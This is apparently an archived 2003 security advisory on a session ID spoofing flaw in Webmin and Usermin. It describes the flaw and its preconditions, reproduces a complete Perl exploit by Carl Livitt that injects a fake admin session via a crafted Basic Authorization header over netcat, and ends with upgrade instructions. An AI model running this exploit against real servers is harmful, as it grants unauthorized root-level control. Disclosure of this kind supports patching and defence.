COMMAND Webmin/Usermin Session ID Spoofing Vulnerability SYSTEMS AFFECTED Webmin Version: 0.960 Usermin Version: 0.90 Update (24 Februrary 2003) ====== Webmin Version: 1.060 Usermin Version: 0.990 PROBLEM Keigo Yamazaki of LAC Co.,Ltd [http://www.lac.co.jp/] found : Webmin is a web-based system administration tool for Unix. Usermin is a web interface that allows all users on a Unix system to easily receive mails and to perform SSH and mail forwarding configuration. Internal communication between the parent process and the child process using named pipes occur in these software packages during creation or verification of a session ID, or during the setting process of password timeouts. Because the control characters contained in the data passed as authentication information are not eliminated, it is possible to make Webmin and Usermin to acknowledge the combination of any user and session ID specified by an attacker. If the attacker could log into Webmin by using this problem, there is a possibility that arbitrary commands may be executed with root privileges. [Preconditions for a successful exploit] In the case of Webmin : * Webmin->Configuration->Authentication "Enable password timeouts" is enabled * if a valid Webmin username is known by default, user "admin" exists and this user can use all the functions, including command shell In the case of Usermin: * if password timeout is enabled * if a valid Usermin username is known Update (24 Februrary 2003) ====== In Secure Net Service(SNS) security advisory [snsadv@lac.co.jp] a Computer Security Laboratory, LAC : http://www.lac.co.jp/security/english/snsadv_e/62_e.html Bug discovered by: Keigo Yamazaki, thanks to: Jamie Cameron A vulnerability that could result in a session ID spoofing exists in miniserv.pl, which is a webserver program that gets both Webmin and Usermin to run. Problem Description: -------------------- Webmin is a web-based system administration tool for Unix. Usermin is a web interface that allows all users on a Unix system to easily receive mails and to perform SSH and mail forwarding configuration. Miniserv.pl is a webserver program that gets both Webmin and Usermin to run. Miniserv.pl carries out named pipe communication between the parent and the child process during for example, the creation and confirmation of a session ID (session used for access control via the Web) and during the password timeout process. Miniserv.pl does not check whether metacharacters, such as line feed or carriage return, are included with BASE64 encoded strings during the BASIC authentication process. As a result, any user can login as an administrative user "admin" and spoof a session ID by using the pipe. Exploitation therefore, could make it possible for attackers to bypass authentication and execute arbitrary command as root. [Preconditions for the exploit] Webmin: * Webmin -> Configuration -> Authentication and "Enable password timeouts" is ON * a valid Webmin username is known Usermin: * "Enable password timeouts" is ON * a valid Webmin username is known -Also- Carl Livitt [carl@learningshophull.co.uk] says : Attached is an exploit for the latest Webmin vulnerability. It relies on a non-default setting (passdelay) to be enabled. Webmin can verify user authentication by use of a session ID (SID) that is assigned when a user successfully authenticates to Webmin. It is possible to inject a fake SID into the session ID database by using a malicious username containing control sequences used internally by Webmin. This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it is a simple case of creating a cookie in your favorite browser containing: sid=1234567890; testing=1 Such that the Cookie HTTP header contains: Cookie: sid=1234567890; testing=1 When the webmin server recieves this cookie, it is verified as an authentic SID and an attacker can take complete control of the Webmin server... this is basically root access to the box it is running on. #!/usr/bin/perl # # Exploit for Webmin 1.050 -> 1.060 by Carl Livitt # # Inserts a fake session_id into the sessions list of webmin. # Does no error checking... if remote host is not found, no # error will be reported. # print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n"; print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n"; $nc="/usr/bin/netcat"; if($#ARGV == -1) { print "Syntax:\n\t$0 hostname\n"; exit(1); } $hostname=$ARGV[0]; if ( ! -x $nc ) { print "netcat not found!\n"; exit(2); } open(NC, "|$nc $hostname 10000 >& /dev/null"); print NC "GET / HTTP/1.1\n"; print NC "Host: $hostname\n"; print NC "User-agent: webmin\n"; print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n"; close(NC); print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n"; print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will "; print "be authenticated to the webmin server!\n\n"; print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n"; SOLUTION This problem can be eliminated by upgrading to Webmin version 0.970/ Usermin version 0.910, which are available at: http://www.webmin.com/ Update (24 Februrary 2003) ====== This problem can be eliminated by upgrading to Webmin version 1.070 and Usermin version 1.000 available at: http://www.webmin.com/